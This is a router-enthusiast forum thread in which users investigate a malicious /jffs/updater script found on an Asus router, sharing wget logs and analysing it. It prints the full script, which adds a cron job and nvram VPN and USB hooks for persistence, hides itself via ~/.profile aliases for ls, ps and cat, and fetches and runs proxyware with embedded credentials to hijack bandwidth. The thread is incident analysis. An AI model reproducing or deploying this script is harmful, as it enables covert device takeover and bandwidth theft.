What's new

Malware /jffs/updater script.

  • SNBForums Code of Conduct

    SNBForums is a community for everyone, no matter what their level of experience.

    Please be tolerant and patient of others, especially newcomers. We are all here to share and learn!

    The rules are simple: Be patient, be nice, be helpful or be gone!

;)

FYI All wget and curl commands are auto-logged to /jffs/wglst and /jffs/curllst respectively.
Code:
(4925)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(5143)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28027)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28242)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24200)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24447)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26206)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26461)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(15421)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24361)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24577)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19534)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19886)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10807)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2427)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13211)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13678)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(14029)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8184)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2388)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11720)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2429)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(7605)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2391)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11800)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2430)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8066)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2383)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

Ye ask, and ye shall receive!
 
Code:
(4925)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(5143)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28027)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28242)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24200)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24447)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26206)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26461)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(15421)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24361)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24577)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19534)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19886)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10807)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2427)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13211)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13678)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(14029)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8184)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2388)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11720)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2429)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(7605)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2391)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11800)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2430)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8066)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2383)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

Ye ask, and ye shall receive!
Folks, don't click on the last two links.
 
Folks, don't click on the last two links.


Mostly what you would expect 🧐


First Submission
2023-05-10 02:15:39 UTC
Last Submission
2023-05-28 08:45:47 UTC
Last Analysis
2023-05-10 02:15:39 UTC
 
Code:
(4925)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(5143)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28027)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(28242)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24200)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24447)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26206)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(26461)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(15421)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24361)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(24577)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19534)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(19886)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10807)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2427)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13211)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(13678)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(14029)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2431)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8184)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2388)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11720)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2429)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(7605)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2391)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(11800)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2430)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(8066)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2383)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(9213)/usr/sbin/wget -q -t 2 -T 30 https://fwupdate.asuswrt-merlin.net/manifest.txt -O /tmp/wlan_update.txt
(2425)/bin/sh /usr/sbin/webs_update.sh
(1)watchdog
(0)/sbin/init
(10604)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(10603)/bin/sh /jffs/updater
(2412)/bin/sh -c /jffs/updater
(1)crond -l 9
(0)/sbin/init
(3502)wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
(3501)ash /jffs/updater

Ye ask, and ye shall receive!
Where did you get this log file from? If you did the hard reset I suggested in post #2 it should have been wiped out along with any traces of the malware. If you backed up and restored your jffs partition that would have defeated the purpose of the hard reset.
 
Where did you get this log file from? If you did the hard reset I suggested in post #2 it should have been wiped out along with any traces of the malware. If you backed up and restored your jffs partition that would have defeated the purpose of the hard reset.
Great question
 
Where did you get this log file from? If you did the hard reset I suggested in post #2 it should have been wiped out along with any traces of the malware. If you backed up and restored your jffs partition that would have defeated the purpose of the hard reset.
I saved the log and a few other file contents in jffs before I wiped. I just wasn't really sure if it would provide any real details. @thelonelycoder is the mastermind on me providing the details from it. I am surprised he is the first person to say something. The fact that I did a hard reset and complete manual reconfigure is the only reason I can confirm to you today that the malware was wiped.
 
Last edited:
@ColinTaylor

I literally had to manually copy any of custom jffs script contents because all the permissions in JFFS were messed up. Making it completely unfeasible for me to tar and restore by excluding the contents of the malware "/jffs/updater".

Code:
if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

This line of code must have literally done something destructive.
 
  • Like
Reactions: GWB
The scripts I had installed are listed in the signature except @Viktor Jaep script VPNMON-R2 which I have not used in a few months since I canceled my VPN services. No ports were open. Remote access disabled. AiProtect was turned on, I forgot to save its history before nuking the router. VPN services have been turned off for the last three months. Script had a time stamp of May 2, 2023.

WAN access to both ssh and https were disabled, and you aren't using the ASUS router app (which apparently enables WAN access without indicating it in the router settings)? UPNP disabled?
 
WAN access to both ssh and https were disabled, and you aren't using the ASUS router app (which apparently enables WAN access without indicating it in the router settings)? UPNP disabled?
UPNP "Secure" was enabled, Wan access completely disabled.

1685283732650.png


I had skynet installed using skynets default lists. Diversion lite installed using the large blocklist. I just placed an order online for a new SSD. Should arrive tomorrow. I will manually reinstall the scripts in my signature one by one.
 
Last edited:
This line of code must have literally done something destructive.
I don't think so. That code would only affect a terminal session. It hides the updater, updateservice and .profile output from ls, ps and cat.

If you still have a copy of the /jffs/asd.log file you might see something like this, if the malware even made it that far.
Code:
1685259650[remove_file]Delete harmful file,/tmp/updateservice
1685259650[blockfile] /tmp/updateservice is binary.

I can't see anything in the code that @Swistheater posted that is Merlin-specific.
Looking at the nvram variables it modifies a bit closer, some of them were removed from asuswrt firmware versions after 380.x. So my guess is that this is a modified version of some old malware that's been repurposed to monetize the theft of your bandwidth.
 
Last edited:
Question: How exactly do we check for this? Asking for a paranoid friend that lives inside my head.
 
Last edited:
UPNP "Secure" was enabled, Wan access completely disabled.

View attachment 50462

I had skynet installed using skynets default lists. Diversion lite installed using the large blocklist. I just placed an order online for a new SSD. Should arrive tomorrow. I will manually reinstall the scripts in my signature one by one.

You mentioned having a VPN at some point, so that is one possibility. VPN bypasses pretty much all security controls and relies on how you configure the VPN client's permissions. But could just have easily been an infected device on your network, potentially exploiting UPNP or perhaps a weak password on your router.
 
Question: How exactly do we check for this? Asking for a paranoid friend that lives inside my head.

If you want to look for this particular one you can look for the files or log entries that have been posted. If you want to look for any malware in general you have to look through logs, running processes, active connections sourcing from the router, etc.
 
Any idea what this is?

May 28 11:37:36 rc_service: httpd 1965:notify_rc restart_dnsfilter
May 28 11:37:36 custom_script: Running /jffs/scripts/service-event (args: restart dnsfilter)
May 28 11:37:37 custom_config: Appending content of /jffs/configs/dnsmasq.conf.add.
May 28 11:37:37 custom_script: Running /jffs/scripts/dnsmasq.postconf (args: /etc/dnsmasq.conf)
May 28 11:37:37 custom_script: Running /jffs/scripts/firewall-start (args: eth0)
May 28 12:16:43 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 98 and rssi is -61
May 28 12:17:33 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 104 and rssi is -58
 
Any idea what this is?

May 28 11:37:36 rc_service: httpd 1965:notify_rc restart_dnsfilter
May 28 11:37:36 custom_script: Running /jffs/scripts/service-event (args: restart dnsfilter)
May 28 11:37:37 custom_config: Appending content of /jffs/configs/dnsmasq.conf.add.
May 28 11:37:37 custom_script: Running /jffs/scripts/dnsmasq.postconf (args: /etc/dnsmasq.conf)
May 28 11:37:37 custom_script: Running /jffs/scripts/firewall-start (args: eth0)
May 28 12:16:43 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 98 and rssi is -61
May 28 12:17:33 roamast: sta[DC:EF:CA:CF:98:7E] on ap[A0:36:BC:75:7B:5C], rcpi is 104 and rssi is -58
Those messages are unrelated to this thread.
 
OK, Thanks.

The "custom script running" had me concerned as I have not entered any custom scripts, thought it might be malware.
 
Question: How exactly do we check for this? Asking for a paranoid friend that lives inside my head.
I saw it using htop when the script was running, and I was able to access it manually using winscp directly to /jffs/* directory. I couldn't see it in ssh as @ColinTaylor pointed out it highjacks the ./profile so that file appears invisible using "ls" per terminal session. I also saw it when using the cru -l command to investigate the crontab.
 
What is this random /jffs/updater script?

Bash:
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

Code:
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
We call this Proxyjacking. This is well known attack. This is not Malware but Exploit. It's not a new. The only difference is codes(little bit different). There is a funny thing. If I talk about these kinds of attacks at snbforum some people don't and didn't believe it. Some of them even say it doesn't exist. Don't forget you don't even know you are compromised with this attack even if you use Skynet or something else. Some attacks can evade those firewall scripts. Some codes can be generated with ChatGPT something.

.Swistheater?​

If you are targeted the attacker may attack you again and again even if you change a router or reset firmware unless you change the IP Address with different range.
 
Last edited:
I don't think so. That code would only affect a terminal session. It hides the updater, updateservice and .profile output from ls, ps and cat.

If you still have a copy of the /jffs/asd.log file you might see something like this, if the malware even made it that far.
Code:
1685259650[remove_file]Delete harmful file,/tmp/updateservice
1685259650[blockfile] /tmp/updateservice is binary.


Looking at the nvram variables it modifies a bit closer, some of them were removed from asuswrt firmware versions after 380.x. So my guess is that this is a modified version of some old malware that's been repurposed to monetize the theft of your bandwidth.
Do you think routers on John's fork could be impacted?
 

Similar threads

Latest threads

Support SNBForums w/ Amazon

If you'd like to support SNBForums, just use this link and buy anything on Amazon. Thanks!

Sign Up For SNBForums Daily Digest

Get an update of what's new every day delivered to your mailbox. Sign up here!
Top